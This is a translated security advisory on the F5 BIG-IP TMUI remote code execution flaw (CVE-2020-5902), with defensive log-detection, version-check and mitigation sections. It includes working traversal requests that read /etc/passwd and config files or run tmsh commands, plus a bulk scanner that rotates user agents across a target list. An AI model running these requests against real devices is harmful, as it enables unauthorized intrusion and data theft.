网安教育 (Network Security Education)
F5 BIG-IP is an application delivery platform from the US company F5 that integrates traffic management, DNS, inbound/outbound rules, a web application firewall, a web gateway, load balancing and other functions. Specific pages of the Traffic Management User Interface (TMUI), also called the Configuration utility, of F5 BIG-IP products contain a remote code execution vulnerability.
An unauthenticated remote attacker who sends specially crafted requests to these pages can achieve arbitrary Java code execution and thereby take control of all functions of the F5 BIG-IP device, including but not limited to: executing arbitrary system commands, enabling/disabling services, and creating/deleting files on the server side.
tmshCmd
When the service method of tmshCmd handles a request, the command parameter is not sanitized; it is passed straight to WorkspaceUtils.runTmshCommand(cmd, request), which executes the command, restricted to the operations delete, create, list and modify.
```java
// Decompiled tmshCmd handling (vulnerable version): the "command" request parameter
// reaches this whitelist check without any prior authentication once the TMUI
// authentication bypass is used, so the filter below is the only control left.
if ("POST".equalsIgnoreCase(request.getMethod())) {
    String[] cmdArray = command.split(" ");
    String operation = cmdArray[0];
    String module = cmdArray[2];
    // Only create/delete/list/modify on a whitelisted module, and no shell metacharacters
    if (!ShellCommandValidator.checkForBadShellCharacters(command)
            && (operation.equals("create") || operation.equals("delete")
                || operation.equals("list") || operation.equals("modify"))
            && WHITELISTED_TMSH_MODULES.contains(module)) {
        try {
            String[] args = new String[]{command};
            // The tmsh command is executed with elevated privileges
            Result result = Syscall.callElevated(Syscall.TMSH, args);
            output = result.getOutput();
            error = result.getError();
        } catch (CallException var11) {
            logger.error(NLSEngine.getString("ilx.workspace.error.TmshCommandFailed") + ": " + var11.getMessage());
            error = var11.getMessage();
        }
    } else {
        error = NLSEngine.getString("ilx.workspace.error.RejectedTmshCommand");
    }
}
```
fileRead
When the service method of fileRead handles a request, the fileName parameter is not validated; it is passed directly to WorkspaceUtils.readFile(fileName), which reads the file.
fileSave
When the service method of fileSave handles a request, the fileName and content parameters are not validated; they are passed directly to WorkspaceUtils.saveFile(request), which writes the uploaded file.
Affected versions:
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5
fileRead check:
```bash
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
```
Other files read through the same page:
```
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
```
tmshCmd check:
```bash
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
```
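As an added example (not part of the original article), the following Python script looks at the requests above from the defender's side: it shows why the `..;` segment is evaluated differently by the front-end web server and by the servlet container behind it, and it flags such requests in web-server access logs, noting whether they were answered with 200. The `..;` signature it searches for is the same pattern the vendor's `LocationMatch` mitigation keys on. The two "view" functions are a deliberately simplified model of path normalization, not the real implementations, and the access-log lines and IP addresses are constructed for this example.

```python
import re
from posixpath import normpath
from typing import Dict, List
from urllib.parse import unquote

# Signature for the "..;" path-parameter trick used by the requests shown above.
TRAVERSAL_RE = re.compile(r"\.\.;")

# Common/combined access-log format, assumed for this example.
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def frontend_view(path: str) -> str:
    """Simplified model of how a front-end web server evaluates its Location
    rules: ';' path parameters are not stripped, so '..;' is an ordinary segment
    name rather than a parent-directory reference (teaching approximation)."""
    return normpath(path)


def backend_view(path: str) -> str:
    """Simplified model of how a servlet container interprets the same path:
    drop ';param' from every segment first, then resolve '.' and '..'
    (teaching approximation, not the container's real implementation)."""
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    return normpath("/".join(segments))


def analyse_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag requests whose path smuggles a traversal past the front end and
    record whether the back end answered 200, i.e. whether the request succeeded."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue                                   # not an access-log line
        path = unquote(m["target"].split("?", 1)[0])   # %2e%2e; -> ..;
        reasons = []
        if TRAVERSAL_RE.search(path):
            reasons.append("'..;' path-parameter traversal")
        front, back = frontend_view(path), backend_view(path)
        if front != back:
            reasons.append(f"normalization mismatch: front end sees {front}, back end sees {back}")
        if reasons:
            hits.append({
                "ip": m["ip"], "time": m["ts"], "method": m["method"],
                "target": m["target"], "status": m["status"],
                "succeeded": m["status"] == "200", "reasons": reasons,
            })
    return hits


# Constructed sample access-log lines for this example (RFC 5737 test addresses).
SAMPLE_LOG = [
    '203.0.113.10 - - [05/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5123',
    '203.0.113.10 - - [05/Jul/2020:10:00:02 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1820',
    '203.0.113.10 - - [05/Jul/2020:10:00:03 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 944',
    '198.51.100.7 - - [05/Jul/2020:10:00:04 +0000] "POST /tmui/login.jsp/%2e%2e;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 0',
    '192.0.2.5 - - [05/Jul/2020:10:00:05 +0000] "GET /tmui/index.jsp HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in analyse_log(SAMPLE_LOG):
        flag = "SUCCEEDED" if hit["succeeded"] else "blocked/failed"
        print(f'{hit["time"]} {hit["ip"]} {hit["method"]} {hit["target"]} -> {hit["status"]} ({flag})')
        for reason in hit["reasons"]:
            print(f"    {reason}")
```

Run over real logs, the `succeeded` field is the triage signal: a flagged request answered with 200 before the mitigation or upgrade was applied means the files or commands in that request should be treated as disclosed or executed, while a 404 is what the `Redirect 404 /` mitigation returns.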
The check script below is written in Python 3; it can also be downloaded from GitHub.
```python
import requests
from random import choice
import argparse
import json

import warnings
warnings.filterwarnings('ignore')  # ignore SSL warnings

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]

headers = {}


def F5(url, i):
    # print(f'[{i}]')
    checkUrl = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    headers["User-Agent"] = choice(USER_AGENTS)
    try:
        res = requests.get(checkUrl, headers=headers, timeout=3, verify=False)
        print(res.status_code)
        # compare the value with ==, not with 'is' (identity comparison is unreliable for ints)
        if res.status_code == 200:
            print('[{i} +++] The {url} has Vuln !!!!!!!!!!!!'.format(url=url, i=i) + '\n')
            with open('success.txt', 'a') as f1:
                f1.write(url + '\n')
        else:
            print('[{i} xxx] The {url} Not has Vuln'.format(url=url, i=i) + '\n')
    except requests.RequestException:
        print("{url} connection timed out\n".format(url=url))


def get_url():
    i = 1
    with open('urls.txt', 'r') as f:
        for line in f:
            url = line.strip()  # drop the trailing newline
            if not url.startswith('https'):
                url = 'https://' + url
            F5(url, i)
            i += 1


if __name__ == '__main__':
    get_url()
```
General remediation:
Upgrade to the following versions
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
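As an added example (not from the original article), the following Python helper encodes the affected and fixed version ranges listed above so that an inventory of BIG-IP devices can be checked automatically. It also extracts the `Version` line from `tmsh show sys version` output; the sample output embedded below is constructed for this example and its layout is only approximated. Versions outside the listed branches are reported as `unlisted` rather than as safe, because the table above says nothing about them.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, ...]

# (low, high, fixed) per branch, taken from the affected/fixed version lists above.
# A version is "affected" when its first three components fall within [low, high]
# and it is older than the fixed release for that branch.
AFFECTED_RANGES = [
    ("15.0.0", "15.1.0", "15.1.0.4"),
    ("14.1.0", "14.1.2", "14.1.2.6"),
    ("13.1.0", "13.1.3", "13.1.3.4"),
    ("12.1.0", "12.1.5", "12.1.5.2"),
    ("11.6.1", "11.6.5", "11.6.5.2"),
]


def parse_version(text: str) -> Version:
    """'14.1.2.3' -> (14, 1, 2, 3); tuples compare component-wise, and a shorter
    prefix such as (15, 1, 0) sorts before (15, 1, 0, 4)."""
    return tuple(int(part) for part in text.strip().split("."))


def assess(version: str) -> str:
    """Return 'affected', 'fixed' or 'unlisted' for a BIG-IP version string."""
    v = parse_version(version)
    for low, high, fixed in AFFECTED_RANGES:
        if parse_version(low) <= v[:3] <= parse_version(high):
            return "affected" if v < parse_version(fixed) else "fixed"
    return "unlisted"


def is_affected(version: str) -> bool:
    return assess(version) == "affected"


# Constructed sample of 'tmsh show sys version' output (layout approximated for this example).
SAMPLE_TMSH_OUTPUT = """\
Sys::Version
Main Package
  Product     BIG-IP
  Version     14.1.2.3
  Build       0.0.5
"""

# Matches an indented "Version  x.y.z" line; "Sys::Version" does not match.
VERSION_LINE_RE = re.compile(r"^\s*Version\s+(\d+(?:\.\d+)+)\s*$", re.MULTILINE)


def version_from_tmsh(output: str) -> Optional[str]:
    """Pull the software version out of captured tmsh output, or None if absent."""
    m = VERSION_LINE_RE.search(output)
    return m.group(1) if m else None


if __name__ == "__main__":
    for candidate in ["14.1.2.3", "14.1.2.6", "15.1.0", "15.1.0.4", "11.5.4", "16.0.0"]:
        print(f"{candidate:10s} -> {assess(candidate)}")
    found = version_from_tmsh(SAMPLE_TMSH_OUTPUT)
    print(f"inventory sample: {found} -> {assess(found)}")
```

The check deliberately treats a fixed release as the lower bound of "safe" within its branch, so 14.1.2.7 counts as fixed while 14.1.3 is unlisted; extend `AFFECTED_RANGES` from the vendor article if newer branches need to be covered.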
Temporary mitigation:
The vendor advises that the impact can be mitigated temporarily with the following steps.
1) Log in to the affected system and open the tmsh shell with the following command:
```
tmsh
```
2) Edit the configuration of the httpd component:
```
edit /sys httpd all-properties
```
3) Add the following content to the file:
```
include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
'
```
4) Save the file as follows: press ESC, then type
```
:wq
```
5) Run the command that saves the configuration:
```
save /sys config
```
6) Restart the httpd service:
```
restart sys service httpd
```
In addition, block access to the TMUI page from external IP addresses.
References:
- Article: K52145254 – TMUI RCE vulnerability CVE-2020-5902
- BIG-IP application services, hardware and software | F5
- Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902)
- CVE-2020-5902